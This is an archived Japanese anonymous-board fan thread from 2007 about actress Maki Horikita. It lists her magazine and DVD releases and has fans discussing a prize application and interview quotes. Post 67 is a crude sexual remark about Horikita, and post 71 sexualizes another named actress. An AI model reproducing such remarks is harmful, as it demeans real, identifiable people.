2/19(月) ピクトアップ #45 定価600円「アルゼンチンババア・堀北真希」
2/23(金) Kindai (キンダイ) 4月号 定価580円
2/23(金) UP to boy (アップ トゥ ボーイ) 4月号 定価980円「堀北真希のチャレンジスピリッツ・最終回『陶芸』」
http://www.wani.co.jp/uptoboy/index.asp
2/23(金) Myojo (ミョウジョウ) 4月号 定価580円「銀盤のぬくもりがなつかしい 風のコに戻った冬の休日」
2/28(水) TVぴあ 定価280円「堀北真希・連載 in アルゼンチンババア 第2回」
3/4(日) ダ・ヴィンチ 4月号 定価450円「スタジオインタビュー・堀北真希」
3/7(水) ビジュアルBOOK『Cinematic(シネマティック)』定価2415円
http://www.pia.co.jp/piashop/horikita_info/
3/14(水) TVぴあ 定価280円「堀北真希・連載 in アルゼンチンババア 第3回」
3/16(金) 堀北真希 in アルゼンチンババア 〜みつこの夏〜ナビゲートDVD 定価2250円
3/20(火) デジタルフォトテクニック#014 定価1100円「堀北真希の思い出アルバム12」
3/23(金) Myojo (ミョウジョウ) 5月号 定価580円
3/28(水) TVぴあ 定価280円「堀北真希・連載 in アルゼンチンババア 最終回」

67 :名無しさん@お腹いっぱい。:2007/02/23(金) 17:46:44 ID:aIuP5UOj0
まきんぽにおちんぽ入れたい。

68 :名無しさん@お腹いっぱい。:2007/02/23(金) 18:09:50 ID:569bacZLO
スピリッツの応募について聞きたいんだけど、号の異なる応募券二枚を貼るって書いてありますよね!? でも、応募台紙には、応募券を貼るスペースが一つしかない。ってことは応募台紙も二枚必要ってことなんですか?
分かる方教えて下さい!マジレスを!

69 :名無しさん@お腹いっぱい。:2007/02/23(金) 18:46:58 ID:bx4mXgY60
よく読めよ。
貼る所に、応募券を切り取って、って書いてなかった?
一つを応募台紙にして、もう一つは切りとれば良いんじゃないの?

70 :名無しさん@お腹いっぱい。:2007/02/23(金) 18:51:42 ID:kwaPP30E0
>>66


市川由衣ちゃんが例のフレンドパークでゲットしたパソコン『赤ピンクのVAIO』を箱から出したって。


71 :名無しさん@お腹いっぱい。:2007/02/23(金) 20:27:18 ID:G3/4VUVD0
まきまきと違って由衣にゃんは、一肌も二肌も脱いでくれるから好き。

72 :名無しさん@お腹いっぱい。:2007/02/23(金) 21:03:32 ID:TUEt/zZ10
>>66
Myojo 富士急ハイランドでスケート
正月のスケート、節分の豆まき、バレンタイン、ひな祭りとイベントを欠かさないのが堀北家の流儀。
「節分に豆まきもします。私が鬼の役で(笑)」「ひな祭りにもひな人形を飾ります。
ひな人形をしまうのが遅くなるとお嫁にいけなくなるとか言うじゃないですか。
うちは娘たちにお嫁に言って欲しくないみたいで、4月までず〜っとだしっぱなし(笑)
フクザツだけど、愛されてるのかなって」


73 :名無しさん@お腹いっぱい。:2007/02/23(金) 21:12:11 ID:TUEt/zZ10
そういえば、Myojoのイジメ問題の記事にタレントがコメントしてました。
成海璃子「暗いって人をいじめる人がいるけど、そんな人のほうが暗いと思います」

74 :名無しさん@お腹いっぱい。:2007/02/23(金) 21:28:55 ID:BdTEIc830
スケートに行ったのか。スキーに行ったって言ってたけど卒業旅行かな?それとは別かな?

34 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)